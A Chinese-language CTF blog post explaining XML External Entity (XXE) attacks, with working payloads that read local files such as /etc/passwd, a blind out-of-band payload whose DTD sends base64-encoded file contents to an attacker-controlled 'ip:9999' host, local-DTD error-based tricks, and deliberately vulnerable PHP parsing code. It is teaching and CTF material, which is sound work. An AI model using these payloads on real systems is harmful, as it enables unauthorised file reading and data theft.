<!DOCTYPE html>
<html>
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="utf-8">
  <title>xxe | Hexo</title>
  <meta name="keywords" content=" xxe ">
  <meta name="description" content="xxe | Hexo">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="description" content="8/22/2019 11:39:23 AM  HostSplit-Exploitable-Antipatterns-In-Unicode-Normalization 学习IDN 与 UTF-8IDN  国际化域名IDNs (Internationalized Domain Names)也称多语种域名，是指非英语国家为推广本国语言的域名系统的一个总称，例如含有日文的为日文域名，含有中文的域名为中文域">
<meta name="keywords" content="python">
<meta property="og:type" content="article">
<meta property="og:title" content="HostSplit-Exploitable">
<meta property="og:url" content="https://github.com/BrainLyh/2019/08/22/HostSplit/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="8/22/2019 11:39:23 AM  HostSplit-Exploitable-Antipatterns-In-Unicode-Normalization 学习IDN 与 UTF-8IDN  国际化域名IDNs (Internationalized Domain Names)也称多语种域名，是指非英语国家为推广本国语言的域名系统的一个总称，例如含有日文的为日文域名，含有中文的域名为中文域">
<meta property="og:locale" content="default">
<meta property="og:image" content="http://wx2.sinaimg.cn/mw690/006boCb9ly1g68vpab2bbj30qn08tq3k.jpg">
<meta property="og:image" content="http://wx4.sinaimg.cn/mw690/006boCb9ly1g68vpd5xcfj30pa09pq3k.jpg">
<meta property="og:image" content="http://wx1.sinaimg.cn/mw690/006boCb9ly1g68vpgbsavj30qj0dq765.jpg">
<meta property="og:image" content="http://wx3.sinaimg.cn/mw690/006boCb9ly1g68vpjpmkej30oy0cgdh1.jpg">
<meta property="og:image" content="http://wx4.sinaimg.cn/mw690/006boCb9ly1g68vpmmt76j30ok070dgl.jpg">
<meta property="og:updated_time" content="2019-08-31T13:56:26.911Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="HostSplit-Exploitable">
<meta name="twitter:description" content="8/22/2019 11:39:23 AM  HostSplit-Exploitable-Antipatterns-In-Unicode-Normalization 学习IDN 与 UTF-8IDN  国际化域名IDNs (Internationalized Domain Names)也称多语种域名，是指非英语国家为推广本国语言的域名系统的一个总称，例如含有日文的为日文域名，含有中文的域名为中文域">
<meta name="twitter:image" content="http://wx2.sinaimg.cn/mw690/006boCb9ly1g68vpab2bbj30qn08tq3k.jpg">


<link rel="icon" href="/img/avatar.jpg">

<link href="/css/style.css?v=1.0.1" rel="stylesheet">

<link href="/css/hl_theme/gruvbox-dark.css?v=1.0.1" rel="stylesheet">

<link href="//cdn.bootcss.com/animate.css/3.5.2/animate.min.css" rel="stylesheet">
<link href="//cdn.bootcss.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet">

<script src="//cdn.bootcss.com/jquery/2.2.4/jquery.min.js"></script>
<script src="/js/jquery.autocomplete.min.js?v=1.0.1"></script>

<script src="//cdn.bootcss.com/highlight.js/9.12.0/highlight.min.js"></script>
<script>
    hljs.initHighlightingOnLoad();
</script>

<script src="//cdn.bootcss.com/nprogress/0.2.0/nprogress.min.js"></script>



<script src="//cdn.bootcss.com/jquery-cookie/1.4.1/jquery.cookie.min.js"></script>

<script src="/js/iconfont.js?v=1.0.1"></script>

</head>
<div style="display: none">
  <input class="theme_disqus_on" value="false">
  <input class="theme_preload_comment" value="false">
  <input class="theme_blog_path" value>
</div>

<body>
<aside class="nav">
    <div class="nav-left">
        <a href="/" class="avatar_target">
    <img class="avatar" src="/img/avatar.jpg" />
</a>
<div class="author">
    <span>Luc1fer</span>
</div>

<div class="icon">
    
        
        <a title="rss" href="/atom.xml" target="_blank">
            
                <svg class="iconfont-svg" aria-hidden="true">
                    <use xlink:href="#icon-rss"></use>
                </svg>
            
        </a>
        
    
        
        <a title="github" href="https://github.com/BrainLyh" target="_blank">
            
                <svg class="iconfont-svg" aria-hidden="true">
                    <use xlink:href="#icon-github"></use>
                </svg>
            
        </a>
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
        <a title="email" href="mailto:brainsemail@163.com" target="_blank">
            
                <svg class="iconfont-svg" aria-hidden="true">
                    <use xlink:href="#icon-email"></use>
                </svg>
            
        </a>
        
    
        
        <a title="qq" href="http://wpa.qq.com/msgrd?v=3&uin=12128&site=qq&menu=yes" target="_blank">
            
                <svg class="iconfont-svg" aria-hidden="true">
                    <use xlink:href="#icon-qq"></use>
                </svg>
            
        </a>
        
    
        
    
        
        <a title="neteasemusic" href="https://music.163.com/#/user/home?id=125977062" target="_blank">
            
                <svg class="iconfont-svg" aria-hidden="true">
                    <use xlink:href="#icon-neteasemusic"></use>
                </svg>
            
        </a>
        
    
</div>




<ul>
    <li><div class="all active">全部文章<small>(27)</small></div></li>
    
        
            
            <li><div data-rel="WP">WP<small>(5)</small></div>
                
            </li>
            
        
    
        
            
            <li><div data-rel="ctf">ctf<small>(17)</small></div>
                
            </li>
            
        
    
        
            
            <li><div data-rel="比赛回顾">比赛回顾<small>(1)</small></div>
                
            </li>
            
        
    
        
            
            <li><div data-rel="渗透测试">渗透测试<small>(2)</small></div>
                
            </li>
            
        
    
        
            
            <li><div data-rel="docker">docker<small>(1)</small></div>
                
            </li>
            
        
    
        
            
            <li><div data-rel="wp">wp<small>(1)</small></div>
                
            </li>
            
        
    
</ul>
<div class="left-bottom">
    <div class="menus">
    
    
    
    
    </div>
    <div><a  class="friends">友链</a></div>
</div>
<input type="hidden" id="yelog_site_posts_number" value="27">

<div style="display: none">
    <span id="busuanzi_value_site_uv"></span>
    <span id="busuanzi_value_site_pv"></span>
</div>

    </div>
    <div class="nav-right">
        <div class="friends-area">
    <div class="friends-title">
        友情链接
        <i class="back-title-list"></i>
    </div>
    <div class="friends-content">
        <ul>
            
            <li><a target="_blank" href="http://www.gtfly.top/">gtfly</a></li>
            
            <li><a target="_blank" href="https://www.leavesongs.com/">P神</a></li>
            
        </ul>
    </div>
</div>
        <div class="title-list">
    <form onkeydown="if(event.keyCode==13){return false;}">
        <input class="search" type="text" placeholder="Search..." autocomplete="off"id="local-search-input" >
        <i class="cross"></i>
        <span>
            <label for="tagswitch">Tags:</label>
            <input id="tagswitch" type="checkbox" style="display: none" />
            <i id="tagsWitchIcon"></i>
        </span>
    </form>
    <div class="tags-list">
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color3">WP</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color2">python</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color1">javascript</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color5">比赛回顾</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color4">LSB</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color5">MISC</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color3">隐写</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color3">工具</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color5">渗透测试</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color1">mysql load data</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color4">SQL</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color5">SSTI</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color1">redis</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color5">ssrf</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color2">Xdebuf</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color4">ctf</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color4">RSA</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color4">xxe</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color2">docker</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color5">serialize</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color4">php</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color4">弱类型</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color5">命令执行</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color4">zip</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color5">misc</a>
    </li>
    
    <li class="article-tag-list-item">
        <a href="javascript:" class="color4">哈希长度扩展攻击</a>
    </li>
    
    <div class="clearfix"></div>
</div>

    
    <nav id="title-list-nav">
        
        <a  class="WP "
           href="/2018/03/23/CSAW CTF 2016 mfw Writeup/"
           data-tag="WP"
           data-author="" >
            <span class="post-title" title="CSAW CTF 2016 mfw Writeup">CSAW CTF 2016 mfw Writeup</span>
            <span class="post-date" title="2018-03-23 15:13:47">2018/03/23</span>
        </a>
        
        <a  class="ctf "
           href="/2019/08/22/HostSplit/"
           data-tag="python"
           data-author="" >
            <span class="post-title" title="HostSplit-Exploitable">HostSplit-Exploitable</span>
            <span class="post-date" title="2019-08-22 11:39:23">2019/08/22</span>
        </a>
        
        <a  class="WP "
           href="/2017/03/23/HackLu Flatscience WP/"
           data-tag="WP"
           data-author="" >
            <span class="post-title" title="HackLu FlatScience WP">HackLu FlatScience WP</span>
            <span class="post-date" title="2017-03-23 15:13:47">2017/03/23</span>
        </a>
        
        <a  class="ctf "
           href="/2019/08/31/JavaScript原型污染/"
           data-tag="javascript"
           data-author="" >
            <span class="post-title" title="JavaScript Prototype 污染攻击">JavaScript Prototype 污染攻击</span>
            <span class="post-date" title="2019-08-31 21:55:35">2019/08/31</span>
        </a>
        
        <a  class="比赛回顾 "
           href="/2018/07/22/ISCC线下赛回顾/"
           data-tag="比赛回顾"
           data-author="" >
            <span class="post-title" title="2019 ISCC线下赛回顾">2019 ISCC线下赛回顾</span>
            <span class="post-date" title="2018-07-22 15:00:00">2018/07/22</span>
        </a>
        
        <a  class="ctf "
           href="/2018/03/23/LSB隐写/"
           data-tag="LSB,MISC,隐写"
           data-author="" >
            <span class="post-title" title="LSB图片隐写">LSB图片隐写</span>
            <span class="post-date" title="2018-03-23 15:13:47">2018/03/23</span>
        </a>
        
        <a  class="渗透测试 "
           href="/2018/02/23/Nessus使用指南/"
           data-tag="工具,渗透测试"
           data-author="" >
            <span class="post-title" title="Nessus 使用指南">Nessus 使用指南</span>
            <span class="post-date" title="2018-02-23 15:13:47">2018/02/23</span>
        </a>
        
        <a  class="ctf "
           href="/2019/08/07/MySQL LOAD DATA/"
           data-tag="mysql load data"
           data-author="" >
            <span class="post-title" title="MYSQL LOAD DATA">MYSQL LOAD DATA</span>
            <span class="post-date" title="2019-08-07 22:14:02">2019/08/07</span>
        </a>
        
        <a  class="ctf "
           href="/2019/08/02/SQL入门/"
           data-tag="SQL"
           data-author="" >
            <span class="post-title" title="SQL入门">SQL入门</span>
            <span class="post-date" title="2019-08-02 09:43:50">2019/08/02</span>
        </a>
        
        <a  class="ctf "
           href="/2019/08/30/SSTI/"
           data-tag="SSTI"
           data-author="" >
            <span class="post-title" title="SSTI-服务器端模板注入">SSTI-服务器端模板注入</span>
            <span class="post-date" title="2019-08-30 15:28:13">2019/08/30</span>
        </a>
        
        <a  class="ctf "
           href="/2019/08/16/SSRF/"
           data-tag="redis,ssrf"
           data-author="" >
            <span class="post-title" title="redis与ssrf">redis与ssrf</span>
            <span class="post-date" title="2019-08-16 16:11:22">2019/08/16</span>
        </a>
        
        <a  class="ctf "
           href="/2019/08/17/Xdebug/"
           data-tag="Xdebuf,ctf"
           data-author="" >
            <span class="post-title" title="Xdebug">Xdebug</span>
            <span class="post-date" title="2019-08-17 23:23:45">2019/08/17</span>
        </a>
        
        <a  class="WP "
           href="/2019/07/26/peaCTF-WP/"
           data-tag="WP,RSA"
           data-author="" >
            <span class="post-title" title="peaCTF WP">peaCTF WP</span>
            <span class="post-date" title="2019-07-26 15:13:47">2019/07/26</span>
        </a>
        
        <a  class="ctf "
           href="/2019/08/17/xxe/"
           data-tag="xxe"
           data-author="" >
            <span class="post-title" title="xxe">xxe</span>
            <span class="post-date" title="2019-08-17 15:23:51">2019/08/17</span>
        </a>
        
        <a  class="ctf "
           href="/2019/08/10/redis/"
           data-tag="redis,ssrf"
           data-author="" >
            <span class="post-title" title="redis与ssrf">redis与ssrf</span>
            <span class="post-date" title="2019-08-10 15:44:26">2019/08/10</span>
        </a>
        
        <a  class="docker "
           href="/2019/08/02/ubuntu配置docker/"
           data-tag="docker"
           data-author="" >
            <span class="post-title" title="Ubuntu 16.04 配置docker">Ubuntu 16.04 配置docker</span>
            <span class="post-date" title="2019-08-02 16:15:29">2019/08/02</span>
        </a>
        
        <a  class="ctf "
           href="/2019/03/23/序列化与反序列化/"
           data-tag="serialize,php"
           data-author="" >
            <span class="post-title" title="序列化与反序列化">序列化与反序列化</span>
            <span class="post-date" title="2019-03-23 15:13:47">2019/03/23</span>
        </a>
        
        <a  class="渗透测试 "
           href="/2018/03/23/渗透测试-信息收集/"
           data-tag="渗透测试"
           data-author="" >
            <span class="post-title" title="渗透测试-信息收集">渗透测试-信息收集</span>
            <span class="post-date" title="2018-03-23 15:13:47">2018/03/23</span>
        </a>
        
        <a  class="ctf "
           href="/2019/08/19/Black_magic/"
           data-tag="php,弱类型"
           data-author="" >
            <span class="post-title" title="black_magic">black_magic</span>
            <span class="post-date" title="2019-08-19 18:59:50">2019/08/19</span>
        </a>
        
        <a  class="ctf "
           href="/2019/03/23/Command-Execution/"
           data-tag="php,命令执行"
           data-author="" >
            <span class="post-title" title="命令执行漏洞(Command Execution)">命令执行漏洞(Command Execution)</span>
            <span class="post-date" title="2019-03-23 15:13:47">2019/03/23</span>
        </a>
        
        <a  class="WP "
           href="/2018/03/23/HITCON-Babytrick/"
           data-tag="WP,SQL,serialize"
           data-author="" >
            <span class="post-title" title="HITCON-babytrick">HITCON-babytrick</span>
            <span class="post-date" title="2018-03-23 15:13:47">2018/03/23</span>
        </a>
        
        <a  class="wp "
           href="/2019/08/16/De1ctf/"
           data-tag="ssrf,RSA"
           data-author="" >
            <span class="post-title" title="De1ctf">De1ctf</span>
            <span class="post-date" title="2019-08-16 20:00:50">2019/08/16</span>
        </a>
        
        <a  class="ctf "
           href="/2018/05/23/RSA/"
           data-tag="RSA"
           data-author="" >
            <span class="post-title" title="RSA">RSA</span>
            <span class="post-date" title="2018-05-23 15:13:47">2018/05/23</span>
        </a>
        
        <a  class="ctf "
           href="/2019/03/23/ZIP伪加密/"
           data-tag="zip,misc"
           data-author="" >
            <span class="post-title" title="ZIP&#39;s things">ZIP&#39;s things</span>
            <span class="post-date" title="2019-03-23 15:13:47">2019/03/23</span>
        </a>
        
        <a  class="ctf "
           href="/2019/08/01/session_unserialize/"
           data-tag="serialize,php"
           data-author="" >
            <span class="post-title" title="Session_unserlize">Session_unserlize</span>
            <span class="post-date" title="2019-08-01 19:33:07">2019/08/01</span>
        </a>
        
        <a  class="WP "
           href="/2019/08/01/JarvisOJ/"
           data-tag="WP,SQL,serialize,哈希长度扩展攻击"
           data-author="" >
            <span class="post-title" title="JarvisOJ WP">JarvisOJ WP</span>
            <span class="post-date" title="2019-08-01 19:37:28">2019/08/01</span>
        </a>
        
        <a  class="ctf "
           href="/2019/07/28/SQL/"
           data-tag="SQL"
           data-author="" >
            <span class="post-title" title="SQL">SQL</span>
            <span class="post-date" title="2019-07-28 15:13:47">2019/07/28</span>
        </a>
        
    </nav>
</div>
    </div>
    <div class="hide-list">
        <div class="semicircle">
            <div class="brackets first"><</div>
            <div class="brackets">&gt;</div>
        </div>
    </div>
</aside>
<div class="post">
    <div class="pjax">
        <article id="post-xxe" class="article article-type-post" itemscope itemprop="blogPost">
    
        <h1 class="article-title">xxe</h1>
    
    <div class="article-meta">
        
        
        
        <span class="book">
            
                <a href="javascript:" data-rel="ctf">ctf</a>
            
        </span>
        
        
        <span class="tag">
            
            <a href="javascript:" class="color4">xxe</a>
            
        </span>
        
    </div>
    <div class="article-meta">
        
        创建时间:<time class="date" title='更新时间: 2019-08-30 11:25:03'>2019-08-17 15:23</time>
        
    </div>
    <div class="article-meta">
        
        
        <span id="busuanzi_container_page_pv">
            阅读:<span id="busuanzi_value_page_pv">
                <span class="count-comment">
                    <span class="spinner">
                      <div class="cube1"></div>
                      <div class="cube2"></div>
                    </span>
                </span>
            </span>
        </span>
        
        
    </div>
    
    <div class="toc-ref">
    
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#XXE"><span class="toc-text">XXE</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#定义实体"><span class="toc-text">定义实体</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#实体引用"><span class="toc-text">实体引用</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#DTD-document-type-definition-文档类型定义"><span class="toc-text">DTD(document type definition 文档类型定义)</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#外部声明默认协议"><span class="toc-text">外部声明默认协议</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#通用实体与参数实体"><span class="toc-text">通用实体与参数实体</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#有回显读本地敏感文件"><span class="toc-text">有回显读本地敏感文件</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#无回显读取本地敏感文件-Blind-OOB-XXE"><span class="toc-text">无回显读取本地敏感文件(Blind OOB XXE)</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Exploiting-XXE-with-local-DTD-files"><span class="toc-text">Exploiting XXE with local DTD files</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#参考链接"><span class="toc-text">参考链接</span></a></li></ol></li></ol>
    
<style>
    .left-col .switch-btn,
    .left-col .switch-area {
        display: none;
    }
    .toc-level-3 i,
    .toc-level-3 ol {
        display: none !important;
    }
</style>
</div>
    <div class="article-entry" itemprop="articleBody">
      
        <h1 id="XXE"><a href="#XXE" class="headerlink" title="XXE"></a>XXE</h1><h2 id="定义实体"><a href="#定义实体" class="headerlink" title="定义实体"></a>定义实体</h2><pre><code>&lt;?xml version=&quot;1.0&quot; encoding=&quot;ISO-8859-1&quot;?&gt;
&lt;!DOCTYPE foo [
&lt;!ELEMENT foo ANY &gt;
&lt;!ENTITY xxe &quot;test&quot; &gt;]&gt;</code></pre><p>定义ANY说明接受任何元素，定义了了一个XML实体xxe，我们可以通过&amp;进行引用。XML可以写成这样，我们输出的结果中xxe被替换成了test</p>
<pre><code>&lt;creds&gt;
&lt;user&gt;&amp;xxe;&lt;/user&gt;
&lt;pass&gt;mypass&lt;/pass&gt;
&lt;/creds&gt;</code></pre><h2 id="实体引用"><a href="#实体引用" class="headerlink" title="实体引用"></a>实体引用</h2><pre><code>&amp;lt;    &lt;    小于号
&amp;gt;    &gt;    大于号
&amp;amp;    &amp;    和号
&amp;apos;    &#39;    单引号
&amp;quot;    &quot;    引号 </code></pre><h2 id="DTD-document-type-definition-文档类型定义"><a href="#DTD-document-type-definition-文档类型定义" class="headerlink" title="DTD(document type definition 文档类型定义)"></a>DTD(document type definition 文档类型定义)</h2><p>自定义XML文档的合法构建模块，可以在XML内部声明也可以外部引用。</p>
<p><code>SYSTEM</code> 外部引用文件<br>    <!DOCTYPE note SYSTEM "XXX.XX"></p>
<p>内部实体声明</p>
<pre><code>&lt;!ENTITY entity-name &quot;entity-value&quot;&gt;

&lt;?xml version=&#39;1.0&#39;?&gt;
&lt;!DOCTYPE mail[
&lt;!ELEMENT mail (message)&gt;
&lt;!ENTITY hacker &quot;hacker&#39;s data&quot;&gt;
]&gt;

&lt;mail&gt;
    &lt;message&gt;&amp;hacker;&lt;/message&gt;
&lt;/mail&gt;</code></pre><p>外部实体声明</p>
<pre><code>&lt;?xml version=&#39;1.0&#39;?&gt;
&lt;!DOCTYPE mail[
&lt;!ELEMENT mail (message)&gt;
&lt;!--ENTITY hacker &quot;hacker&#39;s data&quot;--&gt;
&lt;!ENTITY hacker SYSTEM &quot;file:///C:/Windows/win.ini&quot;&gt;
]&gt;
&lt;mail&gt;
    &lt;message&gt;&amp;hacker;&lt;/message&gt;
&lt;/mail&gt;</code></pre><p>当然我们也可以引用公用DTD，语法如下</p>
<pre><code>&lt;!DOCTYPE 根元素名称 PUBLIC “DTD标识名” “公用DTD的URI”&gt;</code></pre><p>起和SYSTEM一样的作用</p>
<h2 id="外部声明默认协议"><a href="#外部声明默认协议" class="headerlink" title="外部声明默认协议"></a>外部声明默认协议</h2><p><img src="https://xzfile.aliyuncs.com/media/upload/picture/20181120002647-e93bbf00-ec17-1.png" alt></p>
<h2 id="通用实体与参数实体"><a href="#通用实体与参数实体" class="headerlink" title="通用实体与参数实体"></a>通用实体与参数实体</h2><p>只能用在DTD和文档的内部子集中</p>
<p><strong>通用实体</strong> <code>&amp;name;</code> 在DTD中定义，在XML中引用，如上文的示例代码。</p>
<p><strong>参数实体</strong></p>
<ol>
<li>使用 <code>% name</code> 在DTD中定义，并且只能在DTD中使用<code>%name</code>引用</li>
<li>只有在DTD文件中，参数实体的声明才能引用其他实体</li>
<li>参数实体也可以外部引用。</li>
</ol>
<h2 id="有回显读本地敏感文件"><a href="#有回显读本地敏感文件" class="headerlink" title="有回显读本地敏感文件"></a>有回显读本地敏感文件</h2><p>本地服务器解析代码</p>
<pre><code>&lt;?php

    libxml_disable_entity_loader (false);
    $xmlfile = file_get_contents(&#39;php://input&#39;);
    $dom = new DOMDocument();
    $dom-&gt;loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD); 
    $creds = simplexml_import_dom($dom);
    echo $creds;

?&gt;</code></pre><p>payload</p>
<pre><code>&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt; 
&lt;!DOCTYPE creds [  
&lt;!ENTITY goodies SYSTEM &quot;file:///c:/windows/system.ini&quot;&gt; ]&gt; 
&lt;creds&gt;&amp;goodies;&lt;/creds&gt;</code></pre><p>成功读取到敏感文件，但是如果我们的目标文件包含特殊符号时XML解释器会生成错误，我们这样做就会报错，此时我们就使用 <code>&lt;![CDATA[</code>在参数实体中进行。</p>
<p>payload</p>
<pre><code>&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt; 
&lt;!DOCTYPE roottag [
&lt;!ENTITY % start &quot;&lt;![CDATA[&quot;&gt;   
&lt;!ENTITY % goodies SYSTEM &quot;file:///d:/test.txt&quot;&gt;  
&lt;!ENTITY % end &quot;]]&gt;&quot;&gt;  
&lt;!ENTITY % dtd SYSTEM &quot;http://ip/evil.dtd&quot;&gt; 
%dtd; ]&gt; 

&lt;roottag&gt;&amp;all;&lt;/roottag&gt;</code></pre><p>evil.dtd</p>
<pre><code>&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt; 
&lt;!ENTITY all &quot;%start;%goodies;%end;&quot;&gt;</code></pre><p>also,we can read the file just bs64-encode</p>
<pre><code>&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt; 
    &lt;!DOCTYPE creds [  
    &lt;!ENTITY goodies SYSTEM &quot;php://filter/read=convert.base64-encode/resource=
file:///D:/test.txt&quot;&gt; ]&gt; 
    &lt;creds&gt;&amp;goodies;&lt;/creds&gt;</code></pre><p>这样就算有特殊字符也不怕啦！</p>
<h2 id="无回显读取本地敏感文件-Blind-OOB-XXE"><a href="#无回显读取本地敏感文件-Blind-OOB-XXE" class="headerlink" title="无回显读取本地敏感文件(Blind OOB XXE)"></a>无回显读取本地敏感文件(Blind OOB XXE)</h2><p>xml.php</p>
<pre><code>&lt;?php

libxml_disable_entity_loader (false);
$xmlfile = file_get_contents(&#39;php://input&#39;);
$dom = new DOMDocument();
$dom-&gt;loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD); //loadXML() 方法通过解析一个 XML 标签字符串来组成该文档。
?&gt;</code></pre><p>test.dtd</p>
<pre><code>&lt;!ENTITY % file SYSTEM &quot;php://filter/read=convert.base64-encode/resource=file:///D:/test.txt&quot;&gt;
&lt;!ENTITY % int &quot;&lt;!ENTITY &amp;#37 send SYSTEM &#39;http://ip:9999?p=%file;&#39;&gt;&quot;&gt;</code></pre><p>payload</p>
<pre><code>&lt;!DOCTYPE convert [ 
&lt;!ENTITY % remote SYSTEM &quot;http://ip/test.dtd&quot;&gt;
%remote;%int;%send;
]&gt;</code></pre><p>在payload的最后我们连续调用了三个参数实体<code>%remote;%int;%send;</code>，这就是我们的利用顺序。<code>%remote</code>先告诉解释器请求远程URL的<code>test.dtd</code>，随后<code>%int</code>调用参数实体中的<code>$file</code>，这将请求test.txt的内容并将其编码，最后调用<code>%send</code>将数据发送到vps上。</p>
<h2 id="Exploiting-XXE-with-local-DTD-files"><a href="#Exploiting-XXE-with-local-DTD-files" class="headerlink" title="Exploiting XXE with local DTD files"></a>Exploiting XXE with local DTD files</h2><p>8/30/2019 10:47:36 AM </p>
<p>在Ogeak-ctf里碰上一道xxe的题，<a href="http://47.107.253.140:18080/webserver/" title="题目链接" target="_blank" rel="noopener">http://47.107.253.140:18080/webserver/</a></p>
<p>在源码里找到一段奇怪的JS</p>
<pre><code>var data = &quot;&lt;?xml version=\&quot;1.0\&quot; ?&gt;\n&lt;request&gt;\n    &lt;status&gt;1&lt;/status&gt;\n&lt;/request&gt;&quot;;

setInterval(function(){
    $.post(&quot;callback&quot;, data);
}, 10000);</code></pre><p>当时看不懂这是干嘛的，因为也有事也就没做了。事后再看这段代码发现是一个定时函数，每10秒post一个xml实体。我们抓包看一下</p>
<p>在实体部分找上文的最简单的例子，不包含任何读文件的代码试一下发现返回<code>200</code>，尝试读文件返回<code>500</code>.</p>
<p>尝试利用<code>OOB XXE</code>发现vps根本没回显，听大佬说是屏蔽了外网。只能利用本地DTD了。</p>
<p>原理看<a href="https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/" title="这篇文章" target="_blank" rel="noopener">https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/</a></p>
<p>读完大意就是如果我们找到了一个内部的DTD，我们可以强制在目标主机上写一个本地dtd文件，在这个文件中重写上一步我们在内部DTD中找到的参数。如果我们定义了两个同名实体，只有第一个会被执行。于是我们可以利用本地DTD文件不会被过滤来读我们的目标文件。</p>
<p>like this</p>
<pre><code>Request

&lt;?xml version=&quot;1.0&quot; ?&gt;
&lt;!DOCTYPE message [
    &lt;!ENTITY % local_dtd SYSTEM &quot;file:///opt/IBM/WebSphere/AppServer/properties/sip-app_1_0.dtd&quot;&gt;

    &lt;!ENTITY % condition &#39;aaa)&gt;
        &lt;!ENTITY &amp;#x25; file SYSTEM &quot;file:///etc/passwd&quot;&gt;
        &lt;!ENTITY &amp;#x25; eval &quot;&lt;!ENTITY &amp;#x26;#x25; error SYSTEM &amp;#x27;file:///nonexistent/&amp;#x25;file;&amp;#x27;&gt;&quot;&gt;
        &amp;#x25;eval;
        &amp;#x25;error;
        &lt;!ELEMENT aa (bb&#39;&gt;

    %local_dtd;
]&gt;
&lt;message&gt;any text&lt;/message&gt;

    Response

java.io.FileNotFoundException: /nonexistent/
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/usr/bin/nologin
daemon:x:2:2:daemon:/:/usr/bin/nologin

(No such file or directory)</code></pre><p>Contents of sip-app_1_0.dtd</p>
<pre><code>…
&lt;!ENTITY % condition &quot;and | or | not | equal | contains | exists | subdomain-of&quot;&gt;
&lt;!ELEMENT pattern (%condition;)&gt;
…</code></pre><p>于是我们<a href="https://www.gosecure.net/blog/2019/07/16/automating-local-dtd-discovery-for-xxe-exploitation" title="依据此" target="_blank" rel="noopener">依据此</a>找到一个dtd文件来利用，这个<code>fonts.dtd</code>刚好是<code>tomcat:8-jre8</code> 里有的</p>
<pre><code>&lt;!DOCTYPE message [
    &lt;!ENTITY % local_dtd SYSTEM &quot;file:///usr/share/xml/fontconfig/fonts.dtd&quot;&gt;

    &lt;!ENTITY % expr &#39;aaa)&gt;
        &lt;!ENTITY &amp;#x25; file SYSTEM &quot;file:///flag&quot;&gt;
        &lt;!ENTITY &amp;#x25; eval &quot;&lt;!ENTITY &amp;#x26;#x25; error SYSTEM &amp;#x27;file:///abcxyz/&amp;#x25;file;&amp;#x27;&gt;&quot;&gt;
        &amp;#x25;eval;
        &amp;#x25;error;
        &lt;!ELEMENT aa (bb&#39;&gt;

    %local_dtd;
]&gt;
&lt;message&gt;&lt;/message&gt;</code></pre><p>于是我们得到了flag</p>
<h2 id="参考链接"><a href="#参考链接" class="headerlink" title="参考链接"></a>参考链接</h2><blockquote>
<p><a href="https://xz.aliyun.com/t/3357#toc-8" target="_blank" rel="noopener">https://xz.aliyun.com/t/3357#toc-8</a></p>
</blockquote>

      
       <hr><span style="font-style: italic;color: gray;"> 转载请注明来源，欢迎对文章中的引用来源进行考证，欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论，也可以邮件至 brainsemail@163.com </span>
    </div>
</article>


<p>
    <a href="javascript:void(0)" class="dashang" onclick="dashangToggle()">赏</a>
</p>


<div class="article_copyright">
    <p><span class="copy-title">文章标题:</span>xxe</p>
    
    <p><span class="copy-title">本文作者:</span><a href="javascript:void(0)" title="Luc1fer">Luc1fer</a></p>
    <p><span class="copy-title">发布时间:</span>2019-08-17, 15:23:51</p>
    <p><span class="copy-title">最后更新:</span>2019-08-30, 11:25:03</p>
    <span class="copy-title">原始链接:</span><a class="post-url" href="/2019/08/17/xxe/" title="xxe">https://github.com/BrainLyh/2019/08/17/xxe/</a>
    <p>
